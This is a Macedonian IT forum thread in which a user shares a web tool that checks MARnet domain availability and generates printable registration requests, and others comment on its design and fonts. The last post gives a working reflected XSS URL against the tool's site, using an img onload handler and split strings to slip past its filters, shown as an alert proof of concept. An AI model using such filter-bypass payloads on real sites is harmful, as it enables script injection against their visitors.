1. Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
  Сокриј

Генератор за барања на домен во МАРнет

Дискусија во форумот 'Генерална дискусија' започната од HijackHacker, 20 Април 2012.

 1. HijackHacker

  HijackHacker
  Gaining Experience

  5,108
  296
  21 Февруари 2008
  Машко
  Web Designer
  Работам 2 дена на едно проектче, па ме интересираат забелешки.
  Линк: http://gorjan.info/domain/
  Сајтот всушност дозволува проверка на домен од марнет дали е слободен, дали е регистриран или дали е регистраран со истечен рок, и на тие што се слободни или истечени дозволува генерирање на барањето кое се поднесува до марнет.
  За жал уште мора да се носи печатено барање на лице место, така да откако ќе ја пополните формата ќе ви изгенерира барање во слика, кое само треба да го симнете и принтнете.

  Не сум тестирал дали се димнезиите ОК на сликата, така да ако некој има малку тонер по дома еден тест супер би дошол :)

  Данке дечки и чекам забелешки
   
  ARMac, olikomerc, lynx и на уште 1 им се допаѓа ова.
 2. LaLi

  LaLi
  Gaining Experience

  319
  202
  3 Февруари 2010
  Машко
  dobro e napraveno pa mozebi ke im dojde pri raka na ovie od marnet :)
   
 3. LaLi

  LaLi
  Gaining Experience

  319
  202
  3 Февруари 2010
  Машко
  samo zabeleska koka se popolnuvat formularive ako moze da gi naprais so edno kopce za "poplni" i i dvete sliki da se prikazuvat kako edna
   
 4. lynx

  lynx
  Unstoppable

  3,371
  3,083
  4 Септември 2008
  Интересно, многу сакам вакви прости автоматизирани процеси.
   
 5. HijackHacker

  HijackHacker
  Gaining Experience

  5,108
  296
  21 Февруари 2008
  Машко
  Web Designer
  @LaLi
  Искрено знам дека така е попрактично во поглед на дизајн, но прозаебано е после за принтање на сликата ако ја направам како една. Можеби да додадам на клик на првото копче да ја даде сликата, и да се префрли на втората форма а првата да ја скрие
   
 6. olikomerc

  olikomerc
  Unstoppable

  4,575
  3,513
  11 Декември 2008
  Машко
  Еве испринтано и скенирано како изгледа:

  [​IMG]
   
 7. ARMac

  ARMac
  Орган

  6,193
  7,107
  2 oктомври 2010
  Машко
  Курајбер
  Ќе ти го вратат барањето во Марнет. Знаеш зошто? Незнаат што се тоа Name Server-и :D

  Ќе си пишеш фино лепо "Именски опслужувач" зошто бабата на шалтер нема време да учи сега некој таму изрази модернистички.

  Иначе супер ти е ова, ќе ни се најде.
   
  На Phenomen му/ѝ се допаѓа ова.
 8. HijackHacker

  HijackHacker
  Gaining Experience

  5,108
  296
  21 Февруари 2008
  Машко
  Web Designer
  Дечки, мислам дека не ја свативте идеата на проектот :)

  Целта е ти да ги пополниш полињата, да кликнеш на „Пополни“, да ја симнеш генерираната слика и таа да ја испринташ и однесеш во марнет, наместо рачно да пополнуваш. Така е почитко и за нив а полесно и за вас :)

  пс. доста се средени у марнет, бев претходна недела, на лице место пополнив барање, за 5 мин беше кренат доменот :)
   
 9. ARMac

  ARMac
  Орган

  6,193
  7,107
  2 oктомври 2010
  Машко
  Курајбер
  А јас за 1-на минута си регистрирав com без да станам од фотељата пред компјутер :D али тоа е што е.
  Ќе го искористам следната недела твојот формулар кога ќе одам за еден клиент да поднесам барање.

  Замисли да ми го вратат да речат несмее компјутерски штампано :D
   
 10. HijackHacker

  HijackHacker
  Gaining Experience

  5,108
  296
  21 Февруари 2008
  Машко
  Web Designer
  Disclaimer: Не одговарам за никакви збрки xD
   
 11. B^nDIT

  B^nDIT
  Gaining Experience

  1,124
  311
  6 Февруари 2010
  Машко
  Им дадов барање испринтано со твојата алатка , се јавив и ми викаат фонтот требало Times New Roman бидејќи компјутер го скенирал тоа автоматизирано
   
 12. HijackHacker

  HijackHacker
  Gaining Experience

  5,108
  296
  21 Февруари 2008
  Машко
  Web Designer
  Абе и ја се јавив, али ми викаат Comic Sans требало...за инат не правам сеа!
   
 13. marv

  marv
  Practice makes perfect

  2,252
  1,539
  5 oктомври 2007
  Машко
  Оргиналниот документ им е со Times. Сум носел едно чудо пополнети и не ми ги враќале. Значи ај нека биде Times New Roman.
   
 14. B^nDIT

  B^nDIT
  Gaining Experience

  1,124
  311
  6 Февруари 2010
  Машко
  Иако беше премногу тешко, успеав да извршам XSS атак:
  Код:
  http://gorjan.info/domain/index.php?domen=%3Cimg%20src=%22../img/bg.png%22%20onload=%22a%20=%20document.createElement%28%27script%27%29;document.body.appendChild%28a%29;a.text%20=%20%27a,l,e,r,t,%28,\%27,e,x,a,m,p,l,e,\%27,%29%27.split%28%27,%27%29.join%28%27%27%29%20%22%3E
  Гледам имаш некоја заштита , не дозволува eval() , ниту <script> , ниту innerHTML ама сепак смее <img>
   

Сподели

Вчитување...